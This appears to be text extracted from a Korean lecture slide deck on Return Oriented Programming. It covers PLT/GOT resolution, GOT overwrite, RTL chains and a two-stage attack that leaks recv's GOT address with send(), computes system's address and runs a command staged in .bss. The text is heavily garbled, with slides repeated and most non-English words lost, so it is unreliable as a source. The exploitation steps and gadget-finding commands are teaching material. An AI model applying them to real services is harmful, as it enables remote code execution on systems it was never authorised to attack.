hlogin7 - PDF 무료 다운로드

0x07. Return Oriented Programming

ROP?

, (DEP, ASLR).

ROP (Return Oriented Programming) (excutable memory) rop. plt, got got overwrite RTL RTL Chain DEP, ASLR gadget

Basic knowledge

plt, got call function before global offset table link_map struct address 2 4 plt jmp got push global offset table 1 push reloc_offset 3 5 got jmp plt + 6 jmp _dl_runtime_resolve call function 12 enter dynamic linker _dl_lookup_symbol_x 8 get SYMTAB address get libc address return _dl_fixup 7 _dl_fixup get.strtab address get function name offset 9 calc real libc address _dl_runtime_resolve 6 call _dl_fixup function name address return _dl_runtime_resolve 11 reloc_offset link_map struct address

plt, got call function before global offset table link_map struct address 2 4 plt jmp got push global offset table 1 push reloc_offset 3 5 got 10 function address jmp _dl_runtime_resolve call function 12 enter dynamic linker _dl_lookup_symbol_x 8 get SYMTAB address get libc address return _dl_fixup 7 _dl_fixup get.strtab address get function name offset 9 calc real libc address _dl_runtime_resolve 6 call _dl_fixup function name address return _dl_runtime_resolve 11 reloc_offset link_map struct address

plt, got call function after plt 1 2 jmp got got function address 3 call function

got overwrite plt 1 2 jmp got got function address 3 call function 3 call arbitrary function

RTL Chain Stack return address 1 return address 2 return address 3 return address 4 ESP Stack return address 1 pop pop ret parameter 1 function argv[1] = parameter 1 argv[2] = parameter 2 1 call function excute function function epilogue 2 parameter 2 return address 2

RTL Chain Stack return address 1 return address 2 return address 3 return address 4 Stack return address 1 pop pop ret parameter 1 function argv[1] = parameter 1 argv[2] = parameter 2 1 call function excute function function epilogue 2 parameter 2 ESP return address 2

ROP Gadget pop - pop - return gadget ret. gadget next return address pop esp next return address, gadget. ex) return address 2

ROP Gadget 1. gadget 2. gadget ret. 3. gadget 4. gadget

ROP (Return Oriented Programming)

ROP (Return Oriented Programming).code section call recv@plt call recv() argv[1] = fd argv[2] = buf_address argv[3] = sizeof(buf) argv[4] = 0 next instruction stack stack next instruction fd fd buf_address buf_address sizeof(buf) sizeof(buf) 0 0

ROP (stage 1).code section call recv@plt call recv() argv[1] = fd argv[2] = buf_address argv[3] = sizeof(buf) argv[4] = 0 next instruction stack corruption, return send@plt stack stack fd buf_address send function ABCD hacker file descriptor recv_got sizeof(buf) 4 0 0

ROP (stage 1) send(hacker_fd, recv_got, 4, 0) recv_got 4. recv_got? got system offset. got plt + 6. got.

ROP (stage 1) offset? offset ex) p recv = 0xb7f03bf0 p system = 0xb7e56190 offset = recv - system system = recv - offset p/x recv - system = 0xada60 p/x recv - 0xada60 = 0xb7e56190 < system >

ROP (stage 0).code section call recv@plt call recv() argv[1] = fd argv[2] = buf_address argv[3] = sizeof(buf) argv[4] = 0 next instruction stack corruption, return recv@plt stack stack stack ppppr return system fd buf_address recv function hacker file descriptor bss ABCD bss sizeof(buf) len(cmd) 0 0

ROP (stage 0) recv(hacker_fd, bss, len(cmd), 0) bss cmd (recv). system(bss) recv cmd bss bss system bss..bss section? C 0..

ROP (Return Oriented Programming) 1. gdb. 2. set follow-fork-mode child. 3.. 4. run ( ) 5. nc localhost port. 6.. 7. pid killall [binaryname]. ex) nc localhost 7777 python test.py ex) killall python

DEMO

ROP (Return Oriented Programming)

ROP (Return Oriented Programming) help.

ROP (Return Oriented Programming). - send, recv -.bss section 8 - recv stack corruption ROP (stage 1) - send hacker. - offset system. ROP (stage 0) - recv system bss section. - stage 1 system rtl chain

ROP (stage 1) recv stack corruption. vuln 100, recv 200. vuln 100 byte sfp 4 byte return address

ROP (stage 1) find gadget for stage 1

ROP (stage 1) calc system address struct.pack( <I, 0x12345678) == \x78\x56\x34\x12

ROP (stage 0) find gadget for stage 0 readelf -S python find.bss section

ROP (stage 0) objdump -d python grep -04 ret find ppppr

ROP (stage 0)